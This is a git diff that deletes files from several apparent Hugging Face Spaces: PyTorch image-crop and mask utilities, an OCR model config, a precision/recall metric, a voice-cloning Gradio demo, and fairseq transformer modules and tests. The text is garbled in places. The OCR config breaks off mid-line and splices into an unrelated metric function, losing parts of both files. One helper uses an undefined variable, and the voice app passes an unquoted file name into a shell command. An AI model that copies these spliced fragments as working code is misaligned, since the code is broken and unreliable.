int(np.round(crop_x - x_delta / 2)) - max_x = int(np.round(crop_x + x_delta / 2)) - min_y = int(np.round(crop_y - y_delta / 2)) - max_y = int(np.round(crop_y + y_delta/2)) - elif method == "upper_left": - min_x = int(np.round(crop_x)) - max_x = int(np.round(crop_x + x_delta)) - min_y = int(np.round(crop_y)) - max_y = int(np.round(crop_y + y_delta)) - - # make sure that the crops are in range - min_x = make_sure_in_range(min_x, 0, I) - max_x = make_sure_in_range(max_x, 0, I) - min_y = make_sure_in_range(min_y, 0, J) - max_y = make_sure_in_range(max_y, 0, J) - - # if in_place, flag the original inputs - if in_place: - original_img[min_x:max_x, min_y:max_y] = 1.0 - # else make the new matrix - else: - # somehow background is normalized to this number - if background_val == "min": - output = np.ones(crop_shape) * np.min(original_img) - else: - output = np.ones(crop_shape) * background_val - real_x_delta = max_x - min_x - real_y_delta = max_y - min_y - origin_x = crop_shape[0] - real_x_delta - origin_y = crop_shape[1] - real_y_delta - output[origin_x:, origin_y:] = original_img[min_x:max_x, min_y:max_y] - return output - - -def get_crop_mask(loc, crop_shape, image_shape, method, indicator=True): - """ - Function that generates the mask - :param loc: - :param crop_shape: - :param image_shape: - :param method: - :return: - """ - crop_map = np.zeros(image_shape) - for crop_loc in loc: - # this is the indicator for point of crop - if indicator: - crop_map[int(crop_loc[0]), int(crop_loc[1])] = 999.0 - # fill in 1.0 in the cropped regions - crop(crop_map, crop_shape, crop_loc, method=method, in_place=True) - return crop_map - -def crop_pytorch_3d(original_img_pytorch, crop_shape, crop_position, out, - method="center", background_val="min"): - """ - Function that take a crop on the original image. - Use PyTorch to do this. - :param original_img_pytorch: (C,H,W) PyTorch Tensor - :param crop_shape: (h, w) integer tuple - :param method: supported in ["center", "upper_left"] - :return: (N, K, C, h, w) PyTorch Tensor - """ - # retrieve inputs - num_slices_per_patch, H, W = original_img_pytorch.shape - crop_x, crop_y = crop_position - x_delta, y_delta = crop_shape - - # locate the four corners - if method == "center": - left_x = int(np.round(crop_x - x_delta / 2)) - right_x = int(np.round(crop_x + x_delta / 2)) - lower_y = int(np.round(crop_y - y_delta / 2)) - upper_y = int(np.round(crop_y + y_delta / 2)) - elif method == "upper_left": - left_x = int(np.round(crop_x)) - right_x = int(np.round(crop_x + x_delta)) - lower_y = int(np.round(crop_y)) - upper_y = int(np.round(crop_y + y_delta)) - - # make sure that the crops are in range - left_x = make_sure_in_range(left_x, 0, H) - right_x = make_sure_in_range(right_x, 0, H) - lower_y = make_sure_in_range(lower_y, 0, W) - upper_y = make_sure_in_range(upper_y, 0, W) - - # somehow background is normalized to this number - if background_val == "min": - out[:, :, :] = original_img_pytorch.min() - else: - out[:, :, :] = background_val - real_x_delta = right_x - left_x - real_y_delta = upper_y - lower_y - origin_x = crop_shape[0] - real_x_delta - origin_y = crop_shape[1] - real_y_delta - out[:, origin_x:, origin_y:] = original_img_pytorch[:, left_x:right_x, lower_y:upper_y] - -def get_max_window_3d(input_image, window_shape, pooling_logic="avg", return_max_values=False): - """ - Function that makes a sliding window of size window_shape over the - input_image and return the UPPER_LEFT corner index with max sum - :param input_image: N*C*H*W - :param window_shape: h*w - :return: N*C*2 - """ - N, C, H, W = input_image.size() - if pooling_logic == "avg": - # use average pooling to locate the window sums - pool_map = torch.nn.functional.avg_pool2d(input_image, window_shape, stride=1) - elif pooling_logic in ["std", "avg_entropy"]: - # create sliding windows - output_size = (H - window_shape[0] + 1, W - window_shape[1] + 1) - sliding_windows = F.unfold(input_image, kernel_size=window_shape).view(N, C, window_shape[0] * window_shape[1], - -1) - # apply aggregation function on each sliding windows - if pooling_logic == "std": - agg_res = sliding_windows.std(dim=2, keepdim=False) - elif pooling_logic == "avg_entropy": - agg_res = -sliding_windows * torch.log(sliding_windows) - (1 - sliding_windows) * torch.log( - 1 - sliding_windows) - agg_res = agg_res.mean(dim=2, keepdim=False) - # merge back - pool_map = F.fold(agg_res, kernel_size=(1, 1), output_size=output_size) - _, _, _, W_map = pool_map.size() - # transform to linear and get the index of the max val locations - max_values, max_linear_idx = torch.max(pool_map.view(N, C, -1), -1) - # convert back to 2d index - max_idx_x = max_linear_idx // W_map - max_idx_y = max_linear_idx - max_idx_x * W_map - # put together the 2d index - # Here X is pointing to height (upper), y to width (left) - upper_left_points = torch.cat([max_idx_x.unsqueeze(-1), max_idx_y.unsqueeze(-1)], dim=-1) - - if return_max_values: - return max_values, upper_left_points - return upper_left_points - -def generate_mask_uplft_3d(input_image, window_shape, upper_left_points, use_gpu=False, half=False): - """ - Function that generates mask that sets crops given upper_left - corners to 0 - :param input_image: - :param window_shape: - :param upper_left_points: - :return: - """ - N, C, H, W = input_image.size() - window_h, window_w = window_shape - # get the positions of masks - mask_x_min = upper_left_points[:, :, 0] - mask_x_max = upper_left_points[:, :, 0] + window_h - mask_y_min = upper_left_points[:, :, 1] - mask_y_max = upper_left_points[:, :, 1] + window_w - # generate masks - if use_gpu: - mask_x = Variable(torch.arange(0, H).cuda().view(-1, 1).repeat(N, C, 1, W)) - mask_y = Variable(torch.arange(0, W).cuda().view(1, -1).repeat(N, C, H, 1)) - else: - mask_x = Variable(torch.arange(0, H).view(-1, 1).repeat(N, C, 1, W)) - mask_y = Variable(torch.arange(0, W).view(1, -1).repeat(N, C, H, 1)) - - mask_x = mask_x.to(device) - mask_y = mask_y.to(device) - mask_x_min = mask_x_min.to(device) - mask_x_max = mask_x_max.to(device) - - x_gt_min = mask_x >= mask_x_min.unsqueeze(-1).unsqueeze(-1) - x_ls_max = mask_x < mask_x_max.unsqueeze(-1).unsqueeze(-1) - y_gt_min = mask_y >= mask_y_min.unsqueeze(-1).unsqueeze(-1) - y_ls_max = mask_y < mask_y_max.unsqueeze(-1).unsqueeze(-1) - - x_gt_min = x_gt_min.to(device) - x_ls_max = x_ls_max.to(device) - y_gt_min = y_gt_min.to(device) - y_ls_max = y_ls_max.to(device) - - # since logic operation is not supported for variable - # I used * for logic ANd - selected_x = x_gt_min * x_ls_max - selected_y = y_gt_min * y_ls_max - selected = selected_x * selected_y - if half: - return 1 - selected.half() - else: - return 1 - selected.float() - \ No newline at end of file diff --git a/spaces/Mountchicken/MAERec-Gradio/configs/textrecog/nrtr/_base_nrtr_modality-transform.py b/spaces/Mountchicken/MAERec-Gradio/configs/textrecog/nrtr/_base_nrtr_modality-transform.py deleted file mode 100644 index 5b21549f8ab62ae72988ef5ebbe13dee14d13ece..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/configs/textrecog/nrtr/_base_nrtr_modality-transform.py +++ /dev/null @@ -1,111 +0,0 @@ -dictionary = dict( - type='Dictionary', - dict_file='{{ fileDirname }}/../../../dicts/english_digits_symbols.txt', - with_padding=True, - with_unknown=True, - same_start_end=True, - with_start=True, - with_end=True) - -model = dict( - type='NRTR', - backbone=dict(type='NRTRModalityTransform'), - encoder=dict(type='NRTREncoder', n_layers=12), - decoder=dict( - type='NRTRDecoder', - module_loss=dict( - type='CEModuleLoss', ignore_first_char=True, flatten=True), - postprocessor=dict(type='AttentionPostprocessor'), - dictionary=dictionary, - max_seq_len=30), - data_preprocessor=dict( - type='TextRecogDataPreprocessor', - mean=[123.675, 116.28, 103.53], - std=[58.395, 57.12, 57.375])) - -train_pipeline = [ - dict(type='LoadImageFromFile', ignore_empty=True, min_size=2), - dict(type='LoadOCRAnnotations', with_text=True), - dict( - type='RescaleToHeight', - height=32, - min_width=32, - max_width=160, - width_divisor=4), - dict(type='PadToWidth', width=160), - dict( - type='PackTextRecogInputs', - meta_keys=('img_path', 'ori_shape', 'img_shape', 'valid_ratio')) -] - -test_pipeline = [ - dict(type='LoadImageFromFile'), - dict( - type='RescaleToHeight', - height=32, - min_width=32, - max_width=160, - width_divisor=16), - dict(type='PadToWidth', width=160), - # add loading annotation after ``Resize`` because ground truth - # does not need to do resize data transform - dict(type='LoadOCRAnnotations', with_text=True), - dict( - type='PackTextRecogInputs', - meta_keys=('img_path', 'ori_shape', 'img_shape', 'valid_ratio')) -] - -tta_pipeline = [ - dict(type='LoadImageFromFile'), - dict( - type='TestTimeAug', - transforms=[ - [ - dict( - type='ConditionApply', - true_transforms=[ - dict( - type='ImgAugWrapper', - args=[dict(cls='Rot90', k=0, keep_size=False)]) - ], - condition="results['img_shape'][1]= 0.0 - assert accum_hit_prec >= 0.0 - assert gt_num >= 0.0 - assert pred_num >= 0.0 - - if gt_num == 0: - recall = 1.0 - precision = 0.0 if pred_num > 0 else 1.0 - else: - recall = float(accum_hit_recall) / gt_num - precision = 0.0 if pred_num == 0 else float(accum_hit_prec) / pred_num - - denom = recall + precision - - hmean = 0.0 if denom == 0 else (2.0 * precision * recall / denom) - - return recall, precision, hmean diff --git a/spaces/MrBodean/VoiceClone/app.py b/spaces/MrBodean/VoiceClone/app.py deleted file mode 100644 index e7d616eafc6d08846c3658d71056405e50a65f38..0000000000000000000000000000000000000000 --- a/spaces/MrBodean/VoiceClone/app.py +++ /dev/null @@ -1,22 +0,0 @@ -import gradio as gr -import os -import shlex - -os.system('wget https://www.dropbox.com/s/luro5o8kjotkn70/synpretrained.pt') -os.system('wget https://www.dropbox.com/s/dv0ymnlqillecfw/encpretrained.pt') -os.system('wget https://www.dropbox.com/s/aiym2qfv7087bsc/vocpretrained.pt') -os.system('ls') - - -def inference(audio, text): - os.system("python demo_cli.py --no_sound --cpu --audio_path "+audio.name+" --text "+shlex.quote(text.strip())) - return 'demo_output_1.wav' - - -title = "Real-Time-Voice-Cloning" -description = "Gradio demo for Real-Time-Voice-Cloning: Clone a voice in 5 seconds to generate arbitrary speech in real-time. To use it, simply upload your audio, or click one of the examples to load them. Read more at the links below." -article = "

      Real-Time Voice Cloning | Github Repo

      " - -examples=[['test.wav',"This is real time voice cloning on huggingface spaces"]] -gr.Interface(inference, inputs=[gr.inputs.Audio(type="file"),"text"], outputs=gr.outputs.Audio(type="file"),enable_queue=True,title=title,description=description,article=article, examples=examples).launch() - diff --git a/spaces/NCTCMumbai/NCTC/models/official/vision/detection/dataloader/__init__.py b/spaces/NCTCMumbai/NCTC/models/official/vision/detection/dataloader/__init__.py deleted file mode 100644 index 931c2ef11db4a949e6c2e95bca44e36bac1241e9..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/official/vision/detection/dataloader/__init__.py +++ /dev/null @@ -1,14 +0,0 @@ -# Copyright 2019 The TensorFlow Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# ============================================================================== diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/rxf/rxf_src/__init__.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/rxf/rxf_src/__init__.py deleted file mode 100644 index 306e232d6f386b26153864601114e162080dcee4..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/rxf/rxf_src/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import label_smoothed_cross_entropy_r3f, sentence_prediction_r3f # noqa diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/speech_recognition/test_data_utils.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/speech_recognition/test_data_utils.py deleted file mode 100644 index a72e0b66948da1349d87eafdef4c4004dd535c96..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/speech_recognition/test_data_utils.py +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. -import unittest - -import torch -from examples.speech_recognition.data import data_utils - - -class DataUtilsTest(unittest.TestCase): - def test_normalization(self): - sample_len1 = torch.tensor( - [ - [ - -0.7661, - -1.3889, - -2.0972, - -0.9134, - -0.7071, - -0.9765, - -0.8700, - -0.8283, - 0.7512, - 1.3211, - 2.1532, - 2.1174, - 1.2800, - 1.2633, - 1.6147, - 1.6322, - 2.0723, - 3.1522, - 3.2852, - 2.2309, - 2.5569, - 2.2183, - 2.2862, - 1.5886, - 0.8773, - 0.8725, - 1.2662, - 0.9899, - 1.1069, - 1.3926, - 1.2795, - 1.1199, - 1.1477, - 1.2687, - 1.3843, - 1.1903, - 0.8355, - 1.1367, - 1.2639, - 1.4707, - ] - ] - ) - out = data_utils.apply_mv_norm(sample_len1) - assert not torch.isnan(out).any() - assert (out == sample_len1).all() diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/model_parallel/modules/__init__.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/model_parallel/modules/__init__.py deleted file mode 100644 index 11603217a188f420ea849ae0fde19979736ba208..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/model_parallel/modules/__init__.py +++ /dev/null @@ -1,17 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. -"""isort:skip_file""" - -from .multihead_attention import ModelParallelMultiheadAttention -from .transformer_layer import ( - ModelParallelTransformerEncoderLayer, - ModelParallelTransformerDecoderLayer, -) - -__all__ = [ - "ModelParallelMultiheadAttention", - "ModelParallelTransformerEncoderLayer", - "ModelParallelTransformerDecoderLayer", -] diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_base.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_base.py deleted file mode 100644 index b4d5604dbbae979b424650882d33b45ebab323e6..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_base.py +++ /dev/null @@ -1,179 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from typing import Dict, List, Optional, Tuple - -import torch -import torch.nn as nn -from fairseq import utils -from fairseq.dataclass.utils import gen_parser_from_dataclass -from fairseq.distributed import fsdp_wrap -from fairseq.models import FairseqEncoderDecoderModel -from fairseq.models.transformer import ( - TransformerEncoderBase, - TransformerDecoderBase, - TransformerConfig, -) -from torch import Tensor - - -class TransformerModelBase(FairseqEncoderDecoderModel): - """ - Transformer model from `"Attention Is All You Need" (Vaswani, et al, 2017) - `_. - - Args: - encoder (TransformerEncoder): the encoder - decoder (TransformerDecoder): the decoder - - The Transformer model provides the following named architectures and - command-line arguments: - - .. argparse:: - :ref: fairseq.models.transformer_parser - :prog: - """ - - def __init__(self, cfg, encoder, decoder): - super().__init__(encoder, decoder) - self.cfg = cfg - self.supports_align_args = True - - @classmethod - def add_args(cls, parser): - """Add model-specific arguments to the parser.""" - # we want to build the args recursively in this case. - gen_parser_from_dataclass( - parser, TransformerConfig(), delete_default=False, with_prefix="" - ) - - @classmethod - def build_model(cls, cfg, task): - """Build a new model instance.""" - - # -- TODO T96535332 - # bug caused by interaction between OmegaConf II and argparsing - cfg.decoder.input_dim = int(cfg.decoder.input_dim) - cfg.decoder.output_dim = int(cfg.decoder.output_dim) - # -- - - if cfg.encoder.layers_to_keep: - cfg.encoder.layers = len(cfg.encoder.layers_to_keep.split(",")) - if cfg.decoder.layers_to_keep: - cfg.decoder.layers = len(cfg.decoder.layers_to_keep.split(",")) - - src_dict, tgt_dict = task.source_dictionary, task.target_dictionary - - if cfg.share_all_embeddings: - if src_dict != tgt_dict: - raise ValueError("--share-all-embeddings requires a joined dictionary") - if cfg.encoder.embed_dim != cfg.decoder.embed_dim: - raise ValueError( - "--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim" - ) - if cfg.decoder.embed_path and ( - cfg.decoder.embed_path != cfg.encoder.embed_path - ): - raise ValueError( - "--share-all-embeddings not compatible with --decoder-embed-path" - ) - encoder_embed_tokens = cls.build_embedding( - cfg, src_dict, cfg.encoder.embed_dim, cfg.encoder.embed_path - ) - decoder_embed_tokens = encoder_embed_tokens - cfg.share_decoder_input_output_embed = True - else: - encoder_embed_tokens = cls.build_embedding( - cfg, src_dict, cfg.encoder.embed_dim, cfg.encoder.embed_path - ) - decoder_embed_tokens = cls.build_embedding( - cfg, tgt_dict, cfg.decoder.embed_dim, cfg.decoder.embed_path - ) - if cfg.offload_activations: - cfg.checkpoint_activations = True # offloading implies checkpointing - encoder = cls.build_encoder(cfg, src_dict, encoder_embed_tokens) - decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens) - if not cfg.share_all_embeddings: - # fsdp_wrap is a no-op when --ddp-backend != fully_sharded - encoder = fsdp_wrap(encoder, min_num_params=cfg.min_params_to_wrap) - decoder = fsdp_wrap(decoder, min_num_params=cfg.min_params_to_wrap) - return cls(cfg, encoder, decoder) - - @classmethod - def build_embedding(cls, cfg, dictionary, embed_dim, path=None): - num_embeddings = len(dictionary) - padding_idx = dictionary.pad() - - emb = Embedding(num_embeddings, embed_dim, padding_idx) - # if provided, load from preloaded dictionaries - if path: - embed_dict = utils.parse_embedding(path) - utils.load_embedding(embed_dict, dictionary, emb) - return emb - - @classmethod - def build_encoder(cls, cfg, src_dict, embed_tokens): - return TransformerEncoderBase(cfg, src_dict, embed_tokens) - - @classmethod - def build_decoder(cls, cfg, tgt_dict, embed_tokens): - return TransformerDecoderBase( - cfg, - tgt_dict, - embed_tokens, - no_encoder_attn=cfg.no_cross_attention, - ) - - # TorchScript doesn't support optional arguments with variable length (**kwargs). - # Current workaround is to add union of all arguments in child classes. - def forward( - self, - src_tokens, - src_lengths, - prev_output_tokens, - return_all_hiddens: bool = True, - features_only: bool = False, - alignment_layer: Optional[int] = None, - alignment_heads: Optional[int] = None, - ): - """ - Run the forward pass for an encoder-decoder model. - - Copied from the base class, but without ``**kwargs``, - which are not supported by TorchScript. - """ - encoder_out = self.encoder( - src_tokens, src_lengths=src_lengths, return_all_hiddens=return_all_hiddens - ) - decoder_out = self.decoder( - prev_output_tokens, - encoder_out=encoder_out, - features_only=features_only, - alignment_layer=alignment_layer, - alignment_heads=alignment_heads, - src_lengths=src_lengths, - return_all_hiddens=return_all_hiddens, - ) - return decoder_out - - # Since get_normalized_probs is in the Fairseq Model which is not scriptable, - # I rewrite the get_normalized_probs from Base Class to call the - # helper function in the Base Class. - @torch.jit.export - def get_normalized_probs( - self, - net_output: Tuple[Tensor, Optional[Dict[str, List[Optional[Tensor]]]]], - log_probs: bool, - sample: Optional[Dict[str, Tensor]] = None, - ): - """Get normalized probabilities (or log probs) from a net's output.""" - return self.get_normalized_probs_scriptable(net_output, log_probs, sample) - - -def Embedding(num_embeddings, embedding_dim, padding_idx): - m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) - nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) - nn.init.constant_(m.weight[padding_idx], 0) - return m diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_encoder.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_encoder.py deleted file mode 100644 index f007776a6f3b7e6731edc01d95aa24eed255d0e8..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_encoder.py +++ /dev/null @@ -1,341 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math -from typing import Dict, List, Optional - -import torch -import torch.nn as nn -from fairseq import utils -from fairseq.distributed import fsdp_wrap -from fairseq.models import FairseqEncoder -from fairseq.modules import ( - FairseqDropout, - LayerDropModuleList, - LayerNorm, - PositionalEmbedding, - SinusoidalPositionalEmbedding, -) -from fairseq.modules import transformer_layer -from fairseq.modules.checkpoint_activations import checkpoint_wrapper -from fairseq.modules.quant_noise import quant_noise as apply_quant_noise_ -from torch import Tensor -from fairseq.models.transformer import ( - TransformerConfig, -) - - -# rewrite name for backward compatibility in `make_generation_fast_` -def module_name_fordropout(module_name: str) -> str: - if module_name == 'TransformerEncoderBase': - return 'TransformerEncoder' - else: - return module_name - - -class TransformerEncoderBase(FairseqEncoder): - """ - Transformer encoder consisting of *cfg.encoder.layers* layers. Each layer - is a :class:`TransformerEncoderLayer`. - - Args: - args (argparse.Namespace): parsed command-line arguments - dictionary (~fairseq.data.Dictionary): encoding dictionary - embed_tokens (torch.nn.Embedding): input embedding - """ - - def __init__(self, cfg, dictionary, embed_tokens): - self.cfg = cfg - super().__init__(dictionary) - self.register_buffer("version", torch.Tensor([3])) - - self.dropout_module = FairseqDropout( - cfg.dropout, module_name=module_name_fordropout(self.__class__.__name__) - ) - self.encoder_layerdrop = cfg.encoder.layerdrop - - embed_dim = embed_tokens.embedding_dim - self.padding_idx = embed_tokens.padding_idx - self.max_source_positions = cfg.max_source_positions - - self.embed_tokens = embed_tokens - - self.embed_scale = 1.0 if cfg.no_scale_embedding else math.sqrt(embed_dim) - - self.embed_positions = ( - PositionalEmbedding( - cfg.max_source_positions, - embed_dim, - self.padding_idx, - learned=cfg.encoder.learned_pos, - ) - if not cfg.no_token_positional_embeddings - else None - ) - if cfg.layernorm_embedding: - self.layernorm_embedding = LayerNorm(embed_dim, export=cfg.export) - else: - self.layernorm_embedding = None - - if not cfg.adaptive_input and cfg.quant_noise.pq > 0: - self.quant_noise = apply_quant_noise_( - nn.Linear(embed_dim, embed_dim, bias=False), - cfg.quant_noise.pq, - cfg.quant_noise.pq_block_size, - ) - else: - self.quant_noise = None - - if self.encoder_layerdrop > 0.0: - self.layers = LayerDropModuleList(p=self.encoder_layerdrop) - else: - self.layers = nn.ModuleList([]) - self.layers.extend( - [self.build_encoder_layer(cfg) for i in range(cfg.encoder.layers)] - ) - self.num_layers = len(self.layers) - - if cfg.encoder.normalize_before: - self.layer_norm = LayerNorm(embed_dim, export=cfg.export) - else: - self.layer_norm = None - - def build_encoder_layer(self, cfg): - layer = transformer_layer.TransformerEncoderLayerBase(cfg) - checkpoint = cfg.checkpoint_activations - if checkpoint: - offload_to_cpu = cfg.offload_activations - layer = checkpoint_wrapper(layer, offload_to_cpu=offload_to_cpu) - # if we are checkpointing, enforce that FSDP always wraps the - # checkpointed layer, regardless of layer size - min_params_to_wrap = cfg.min_params_to_wrap if not checkpoint else 0 - layer = fsdp_wrap(layer, min_num_params=min_params_to_wrap) - return layer - - def forward_embedding( - self, src_tokens, token_embedding: Optional[torch.Tensor] = None - ): - # embed tokens and positions - if token_embedding is None: - token_embedding = self.embed_tokens(src_tokens) - x = embed = self.embed_scale * token_embedding - if self.embed_positions is not None: - x = embed + self.embed_positions(src_tokens) - if self.layernorm_embedding is not None: - x = self.layernorm_embedding(x) - x = self.dropout_module(x) - if self.quant_noise is not None: - x = self.quant_noise(x) - return x, embed - - def forward( - self, - src_tokens, - src_lengths: Optional[torch.Tensor] = None, - return_all_hiddens: bool = False, - token_embeddings: Optional[torch.Tensor] = None, - ): - """ - Args: - src_tokens (LongTensor): tokens in the source language of shape - `(batch, src_len)` - src_lengths (torch.LongTensor): lengths of each source sentence of - shape `(batch)` - return_all_hiddens (bool, optional): also return all of the - intermediate hidden states (default: False). - token_embeddings (torch.Tensor, optional): precomputed embeddings - default `None` will recompute embeddings - - Returns: - dict: - - **encoder_out** (Tensor): the last encoder layer's output of - shape `(src_len, batch, embed_dim)` - - **encoder_padding_mask** (ByteTensor): the positions of - padding elements of shape `(batch, src_len)` - - **encoder_embedding** (Tensor): the (scaled) embedding lookup - of shape `(batch, src_len, embed_dim)` - - **encoder_states** (List[Tensor]): all intermediate - hidden states of shape `(src_len, batch, embed_dim)`. - Only populated if *return_all_hiddens* is True. - """ - return self.forward_scriptable( - src_tokens, src_lengths, return_all_hiddens, token_embeddings - ) - - # TorchScript doesn't support super() method so that the scriptable Subclass - # can't access the base class model in Torchscript. - # Current workaround is to add a helper function with different name and - # call the helper function from scriptable Subclass. - def forward_scriptable( - self, - src_tokens, - src_lengths: Optional[torch.Tensor] = None, - return_all_hiddens: bool = False, - token_embeddings: Optional[torch.Tensor] = None, - ): - """ - Args: - src_tokens (LongTensor): tokens in the source language of shape - `(batch, src_len)` - src_lengths (torch.LongTensor): lengths of each source sentence of - shape `(batch)` - return_all_hiddens (bool, optional): also return all of the - intermediate hidden states (default: False). - token_embeddings (torch.Tensor, optional): precomputed embeddings - default `None` will recompute embeddings - - Returns: - dict: - - **encoder_out** (Tensor): the last encoder layer's output of - shape `(src_len, batch, embed_dim)` - - **encoder_padding_mask** (ByteTensor): the positions of - padding elements of shape `(batch, src_len)` - - **encoder_embedding** (Tensor): the (scaled) embedding lookup - of shape `(batch, src_len, embed_dim)` - - **encoder_states** (List[Tensor]): all intermediate - hidden states of shape `(src_len, batch, embed_dim)`. - Only populated if *return_all_hiddens* is True. - """ - # compute padding mask - encoder_padding_mask = src_tokens.eq(self.padding_idx) - has_pads = src_tokens.device.type == "xla" or encoder_padding_mask.any() - - x, encoder_embedding = self.forward_embedding(src_tokens, token_embeddings) - - # account for padding while computing the representation - if has_pads: - x = x * (1 - encoder_padding_mask.unsqueeze(-1).type_as(x)) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - encoder_states = [] - - if return_all_hiddens: - encoder_states.append(x) - - # encoder layers - for layer in self.layers: - x = layer( - x, encoder_padding_mask=encoder_padding_mask if has_pads else None - ) - if return_all_hiddens: - assert encoder_states is not None - encoder_states.append(x) - - if self.layer_norm is not None: - x = self.layer_norm(x) - - # The Pytorch Mobile lite interpreter does not supports returning NamedTuple in - # `forward` so we use a dictionary instead. - # TorchScript does not support mixed values so the values are all lists. - # The empty list is equivalent to None. - src_lengths = src_tokens.ne(self.padding_idx).sum(dim=1, dtype=torch.int32).reshape(-1, 1).contiguous() - return { - "encoder_out": [x], # T x B x C - "encoder_padding_mask": [encoder_padding_mask], # B x T - "encoder_embedding": [encoder_embedding], # B x T x C - "encoder_states": encoder_states, # List[T x B x C] - "src_tokens": [], - "src_lengths": [src_lengths], - } - - @torch.jit.export - def reorder_encoder_out(self, encoder_out: Dict[str, List[Tensor]], new_order): - """ - Reorder encoder output according to *new_order*. - - Args: - encoder_out: output from the ``forward()`` method - new_order (LongTensor): desired order - - Returns: - *encoder_out* rearranged according to *new_order* - """ - if len(encoder_out["encoder_out"]) == 0: - new_encoder_out = [] - else: - new_encoder_out = [encoder_out["encoder_out"][0].index_select(1, new_order)] - if len(encoder_out["encoder_padding_mask"]) == 0: - new_encoder_padding_mask = [] - else: - new_encoder_padding_mask = [ - encoder_out["encoder_padding_mask"][0].index_select(0, new_order) - ] - if len(encoder_out["encoder_embedding"]) == 0: - new_encoder_embedding = [] - else: - new_encoder_embedding = [ - encoder_out["encoder_embedding"][0].index_select(0, new_order) - ] - - if len(encoder_out["src_tokens"]) == 0: - src_tokens = [] - else: - src_tokens = [(encoder_out["src_tokens"][0]).index_select(0, new_order)] - - if len(encoder_out["src_lengths"]) == 0: - src_lengths = [] - else: - src_lengths = [(encoder_out["src_lengths"][0]).index_select(0, new_order)] - - encoder_states = encoder_out["encoder_states"] - if len(encoder_states) > 0: - for idx, state in enumerate(encoder_states): - encoder_states[idx] = state.index_select(1, new_order) - - return { - "encoder_out": new_encoder_out, # T x B x C - "encoder_padding_mask": new_encoder_padding_mask, # B x T - "encoder_embedding": new_encoder_embedding, # B x T x C - "encoder_states": encoder_states, # List[T x B x C] - "src_tokens": src_tokens, # B x T - "src_lengths": src_lengths, # B x 1 - } - - def max_positions(self): - """Maximum input length supported by the encoder.""" - if self.embed_positions is None: - return self.max_source_positions - return min(self.max_source_positions, self.embed_positions.max_positions) - - def upgrade_state_dict_named(self, state_dict, name): - """Upgrade a (possibly old) state dict for new versions of fairseq.""" - if isinstance(self.embed_positions, SinusoidalPositionalEmbedding): - weights_key = "{}.embed_positions.weights".format(name) - if weights_key in state_dict: - print("deleting {0}".format(weights_key)) - del state_dict[weights_key] - state_dict[ - "{}.embed_positions._float_tensor".format(name) - ] = torch.FloatTensor(1) - for i in range(self.num_layers): - # update layer norms - self.layers[i].upgrade_state_dict_named( - state_dict, "{}.layers.{}".format(name, i) - ) - - version_key = "{}.version".format(name) - if utils.item(state_dict.get(version_key, torch.Tensor([1]))[0]) < 2: - # earlier checkpoints did not normalize after the stack of layers - self.layer_norm = None - self.normalize = False - state_dict[version_key] = torch.Tensor([1]) - return state_dict - - -class TransformerEncoder(TransformerEncoderBase): - def __init__(self, args, dictionary, embed_tokens): - self.args = args - super().__init__( - TransformerConfig.from_namespace(args), - dictionary, - embed_tokens, - ) - - def build_encoder_layer(self, args): - return super().build_encoder_layer( - TransformerConfig.from_namespace(args), - ) diff --git a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/hubert/simple_kmeans/dump_km_label.py b/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/hubert/simple_kmeans/dump_km_label.py deleted file mode 100644 index 8871307804d3f1e5c7cc49061614c69df26ab1ee..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/hubert/simple_kmeans/dump_km_label.py +++ /dev/null @@ -1,98 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE 